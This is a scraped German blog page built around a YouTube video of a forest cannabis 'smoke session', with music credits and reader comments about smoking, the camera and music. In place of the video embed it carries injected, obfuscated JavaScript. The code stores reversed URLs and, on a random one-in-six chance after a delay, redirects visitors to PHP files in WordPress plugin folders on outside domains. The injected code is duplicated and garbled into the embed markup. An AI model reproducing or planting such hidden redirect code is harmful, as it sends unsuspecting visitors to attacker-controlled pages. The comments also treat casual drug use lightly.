Smoke Session im Wald | 4K

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=1&autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=1″ frameborder=”0″ allowfullscreen>

Bei diesem traumhaft schönen/heißen Wetter ab in den Wald und Joints rauchen 😛
NEU!! Instagram:
Kann ich immer empfehlen: *
Twitter my Boys & Girls:

*Das ist ein Affiliate Link, über den ich eine kleine Provision bekomme, wenn ihr dort bestellt 🙂

Musik die ich in meinen Videos verwende:

♫ Yun Mufasa #1
♫ Piano Tails
♫ 90s Old School | Ice Cube type beat:
♫ Bryson Tiller x Ty Dolla Sign Type Beat “Change”:
♫ Rotations 2 – Jack Elphick:
♫ Mick Jenkins – Vibe:
♫ Clásico:
♫ Beast:
♫ Loveline:
♫ Get Lost:

♫ Mein Spotify Account:

Youtube Channel

32 thoughts on “Smoke Session im Wald | 4K”

  1. Young Stoner says:

    Ich liebe den Wald bei nacht wenn ich rauche

  2. Fawkes says:

    Insta ist voll in seinem Modus, die bannen gerade alle memes Seiten weg

  3. neunundsechzig says:

    du bist einfach der beste haha

  4. Obie says:

    likes sind auf 420 ich will nicht 😀

  5. ChrisDeLonghi says:

    ab minute 25, mega der realtalk und absolut true. Bist auf jeden fall ne bereicherung, und es versüßt immer den tag wenn du hochlädst

  6. Obie says:

    alter der Remix von Xxplosive is ja mal so krass bei 25:00min 😀

  7. Marisu says:

    armin van buuren und house?? 😀

  8. D O M I N I K says:

    Dude, ich dachte die ganze Zeit das wär ein Bild hahaha

  9. The Claw says:

    Wald ist immer die beste location. Auch bei 34-35 grad ist es im Wald angenehm kühl. Gehe immer in den Wald.

  10. EdlerTropfen says:

    Krasse Kamera mit 4k, dachte erst das wäre einfach nur ein normales Bild 😀

  11. Hauptmann Hase says:

    Deine Nordlicht Sessions sind super. Überleg auch sowas zu machen

  12. Beter says:

    Gerade auf n Spielplatz gesetzt, dein Video gesehen
    Nicht genug internet dafür

    Nachhause gefahren, gedownladet

    Wieder hingefahren video geschaut und nh Flöte gedampft

  13. Rengie_Gamer says:

    ich will jz auch smoken aber ich brauche mal ne pause haha hab jetzt nen monat fast täglich gekifft muss mal wieder runterschrauben

  14. Benji 0_0 says:

    Jo Johnny, wie alt sollte man denn für eine gemeinsame mit dir Session sein?^^

  15. René Weißglut says:

    Sers, bock mal wenn Du das nächste mal in STA bist einen zu heizen?
    Ich frag einfach mal ^^

    Grüße

  16. TypiCheek says:

    der moment wenn man mit dem gucken wartet bis man dicht ist damit es vollkommen genutzt werden kann, immer wieder gut

  17. WWG1WGA says:

    Einfach "Angerfist" bei Youtube eingeben und genießen. Sollte dir helfen fiesen schund wie House oder EDM zu vergessen. 😀

  18. xViZzu says:

    Wald in WQHD ist anders

  19. Banana Joe says:

    Die Kamera ist fetter als ich

  20. Manfred_geht_mullern says:

    Irgendwie habe ich das gefühl das du bei deinen Videos stoned bist

  21. Bennet S says:

    Wieviel verdienst du ungefähr von YouTube?

    PS bin grad full breit und Feier dich megaa

  22. unruly53 says:

    Könnte niemals alleine im Wald buffen irgendwie

  23. TENSE - Drogenstories says:

    Wäre cool wenn du die Kamera ab und zu umstellst, die Qualität ist nämlich echt verdammt geil.

  24. PädaPedda says:

    der wald ist übertrieben geil. cooles und chilliges video 🙂

  25. skillgamer 44 says:

    25:25 min hab richtig krank Ohrenschmerzen und bin grade zuhause eingeschlafen auf das video

  26. pff pff says:

    einfach die beste stimmung beim video und in den kommentare ich liebe es

  27. pff pff says:

    ich war aufm medusa festival in spanien und des war einfach der hammer ahaha ne aber da gings erst um 8 uhr abends los und dann halt bis 8uhr morgens des war echt hart aber geil

  28. Krypton 50 says:

    Hab dieses video sogar zum (Basilikum) rauchen an gemacht

  29. c0de says:

    7:56 joint ist aus?? dachte das wären räucherstäbchen xD

  30. TJ 999 says:

    Die Natur ist so schön ❤️

Leave a Reply

Your email address will not be published. Required fields are marked *